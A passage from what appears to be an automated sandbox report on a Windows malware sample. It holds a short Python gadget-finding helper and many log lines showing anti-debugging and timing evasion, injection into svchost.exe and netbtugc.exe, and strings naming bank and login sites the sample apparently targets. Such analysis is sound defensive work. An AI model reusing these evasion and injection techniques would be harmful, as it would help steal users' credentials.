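    "90 90"
    "68 31 32 50 C5 CB"   # push C5503231h ; retf
    "6A 30 CB"            # push 00000030h ; retf
    "CC CC"
)
BASE, IMAGE_END = 0x400000, 0x420000

if __name__ == "__main__":
    for g in find_push_ret(SAMPLE, BASE):
        print(f"{g.va:08X} {g.push}; {g.ret} {g.ret_va:08X}  -> {classify(g, BASE, IMAGE_END)}")
```

When triaging a list like the one above, run this over the unpacked region (2.2.svchost.exe.400000.0.unpack) rather than the on-disk file: a true push/ret jump only exists once the payload has been written into memory, and a dump taken before decryption produces the far-return noise by construction.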
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | API/Special instruction interceptor: Address: 40D422C
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7096E rdtsc
Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 9731
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-87183
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.7 %
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe TID: 3560 | Thread sleep time: -65000s >= -30000s
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe TID: 3560 | Thread sleep time: -40500s >= -30000s
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316 | Thread sleep count: 242 > 30
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316 | Thread sleep time: -484000s >= -30000s
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316 | Thread sleep count: 9731 > 30
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316 | Thread sleep time: -19462000s >= -30000s
Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D5C2C0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nt.microsoft.com/profileVMware20,11696487552u
            Source: 01194HH4.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 01194HH4.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rtal.azure.comVMware20,116964875
            Source: 01194HH4.5.dr | Binary or memory string: discord.comVMware20,11696487552f
            Source: 01194HH4.5.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 01194HH4.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 01194HH4.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 01194HH4.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 01194HH4.5.dr | Binary or memory string: global block list test formVMware20,11696487552
            Source: 01194HH4.5.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e365.comVMware20,11696487552t
            Source: 01194HH4.5.dr | Binary or memory string: AMC password management pageVMware20,11696487552
            Source: URUrIrqwFu.exe, 00000003.00000002.3983201981.000000000076E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2764226566.000001CFDF1EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 01194HH4.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 01194HH4.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 01194HH4.5.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: teractivebrokers.co.inVMware20,11696487552d
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware
            Source: 01194HH4.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11
            Source: 01194HH4.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 01194HH4.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 01194HH4.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 01194HH4.5.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 01194HH4.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 01194HH4.5.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,1169648
            Source: 01194HH4.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 01194HH4.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 01194HH4.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 01194HH4.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | API call chain: ExitProcess graph end node graph_0-86871
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7096E rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004172B3 LdrLoadDll
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0045A370 BlockInput
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_040D4498 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_040D44F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_040D2E78 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]2_2_03ABE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
